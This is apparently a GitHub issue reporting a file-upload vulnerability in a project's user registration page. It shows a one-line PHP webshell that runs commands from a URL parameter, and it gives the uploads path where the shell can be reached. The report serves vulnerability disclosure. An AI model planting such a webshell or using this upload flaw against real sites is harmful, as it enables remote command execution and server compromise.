Skip to content

File upload command execution at User registration page #23

@395738382

Description

@395738382

In the user registration page of the v1 version of the site, you can upload the PHP Trojan file at the same interface where you uploaded the image, so that you can execute any command
image
image
image
The webshell contents are as follows:

<?php
system($_GET['cmd']);
?>

You can then access the webshell in the /eco-master/customer/customer_images path and execute any command
image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions